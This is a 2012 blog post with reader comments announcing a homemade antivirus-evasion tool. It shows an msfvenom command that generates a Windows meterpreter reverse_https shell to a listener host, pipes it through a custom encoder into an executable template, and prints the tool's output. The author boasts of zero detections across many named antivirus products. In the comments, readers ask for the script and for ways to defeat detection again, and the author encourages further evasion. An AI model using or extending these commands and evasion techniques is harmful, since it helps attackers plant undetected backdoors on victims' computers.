
Antivirus Sandbox Evasion (part1) – Preview

by foip on February 28th, 2012

Hmmm, it seems that I wrote something very nice ..

$ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 \
    | ./ultimate-payload.pl -t ultimate-payload-template1.exe -o /tmp/payload.exe
[*ultimate] Waiting for payload from STDIN
[*ultimate] Payload: read (size: 367) 
[*ultimate] Payload: encode (new size: 1161) 
[*ultimate] Template: read 94720 bytes from file 
[*ultimate] Template: found pattern 'MY_PAYLOAD:' at position: 36928 
[*ultimate] Output: add the begin of the template (size: 36928) 
[*ultimate] Output: add the encoded payload (size: 1161) 
[*ultimate] Output: add the end of the template (size: 18502) 
[*ultimate] File '/tmp/payload.exe' generated (size: 94720) 

WTF is that? “That” is my new toy: an antivirus evasion tool which bypasses signature, heuristic and … sandbox detections ;-)

Tested on VirusTotal.com (zero detections out of 44), then in virtual machines against:

  • Avast
  • AVG
  • BitDefender
  • Kaspersky
  • McAfee
  • MS Essential Security
  • ESET Nod32
  • GData
  • F-Secure
  • Panda
  • Sophos
  • Symantec (of course)

So far so good. Let me play a bit with it. As soon as I find another (private) method, I swear to release this one …

Stay tuned ;-)


© 2012, foip. All rights reserved.


14 Comments
  1. Great post !!! Pls keep sharing — TKS

  2. Alek permalink

hi, where can i get your ultimate-payload.pl ? for testing ? :P

  3. template Work?

    • foip permalink

      The Perl script uses a homemade encoder, but the important part (for sandbox evasion) is indeed in the template.
      I saw on your blog that you also had fun with this exciting challenge ;-)
      Cheers.

  4. Tommy permalink

    Well done, that’s a good job. Friend, where are we to insert the payload? Is it at the DOS command prompt, or at config.sys, or Metasploit, or other?

  5. Fahsto permalink

    I can’t execute the code line below on BackTrack 5, problem with ultimate-payload.pl.
    Can you help me please?

  6. exceed permalink

    You should keep it private. As soon as you release it will be added to AV databases.

  7. fiu permalink

    Virustotal 10/42!!!!!!!

    • foip permalink

      Thank you for this update. Glad to see that AV vendors are working..
      Since the tool has been released, the score can’t stay eternally at 0/42 ..

      if you want to reach 0/42 again, use your imagination ;)

  8. hatboy666 permalink

    Hi
    payloads created with your template are now detected by antiviruses:
    ———————————————————————–
    Agnitum Backdoor.Swrort!Ar5xwgxMbks 20121008
    Avast Win32:Malware-gen 20121008
    AVG Generic28.CKZJ 20121008
    BitDefender Trojan.Generic.KDV.673845 201210078191
    Emsisoft Trojan.Win32.Swrort!IK 20120919
    F-Secure Trojan.Generic.KDV.673845 20121003
    Fortinet W32/Crypt.BBCR!tr 20121008
    GData Trojan.Generic.KDV.673845 20121009
    Ikarus Trojan.Win32.Swrort 20121008
    Jiangmin Backdoor/Bifrose.xur 20121008
    Kaspersky HEUR:Trojan.Win32.Generic 20121009
    Kingsoft VIRUS_UNKNOWN 20121008
    Heuristic.BehavesLike.Win32.Suspicious-BAY.K 20121008
    Microsoft Trojan:Win32/Swrort.A 20121009
    MicroWorld-eScan Trojan.Generic.KDV.673845 20121009
    nProtect Trojan/W32.Agent.117248.CS 20121008
    TrendMicro-HouseCall – 20121008
    VBA32 Backdoor.Swrort.pt 20121008
    VIPRE BehavesLike.Win32.Malware.bsf (vs) 20121008
    —————————————————————

    Can you tell me how I can edit it to prevent antivirus detection?
    thanks.

  9. sandbox permalink

    Nice work, thanks!

  10. ctg permalink

    Very nice, but the worst thing you did was upload it to VirusTotal. Always test in a virtual machine and against multiple AVs.

    • foip permalink

      ;-)
      I know. But managing 44 AVs on virtual machines was a bit too much for me. When I find that my code works as expected, I keep the concept and start a new one.
      Thanks for reading and commenting! Cheers.
